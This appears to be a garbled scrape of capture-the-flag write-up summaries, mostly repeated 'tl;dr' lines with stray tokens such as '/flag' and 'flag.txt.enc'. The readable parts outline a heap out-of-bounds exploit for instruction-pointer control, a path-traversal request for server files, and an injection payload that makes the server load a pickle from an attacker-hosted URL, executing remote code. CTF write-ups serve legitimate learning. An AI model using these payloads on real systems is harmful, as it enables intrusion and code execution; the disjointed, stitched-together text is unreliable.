tl;dr
- Giving size > 48 causes heap OOB r/w of 16 bytes
- Use OOB r/w get leaks and overwrite objects for rip control
tl;dr
tl;dr
tl;dr
-Get the docker-entrypoint.sh using /static../docker-entrypoint.sh
-Get the challenge files using /static../panda/cgi-bin/search_currency.py
-Host your exploit and use x’|@pd.read_pickle(‘http://0.0.0.0:6334/output.exploit')|' to execute the exploit
tl;dr
tl;dr
tl;dr
/flag
endpoint.tl;dr
SCRIPT_NAME
flag.txt.enc
flag.txt.enc
tl;dr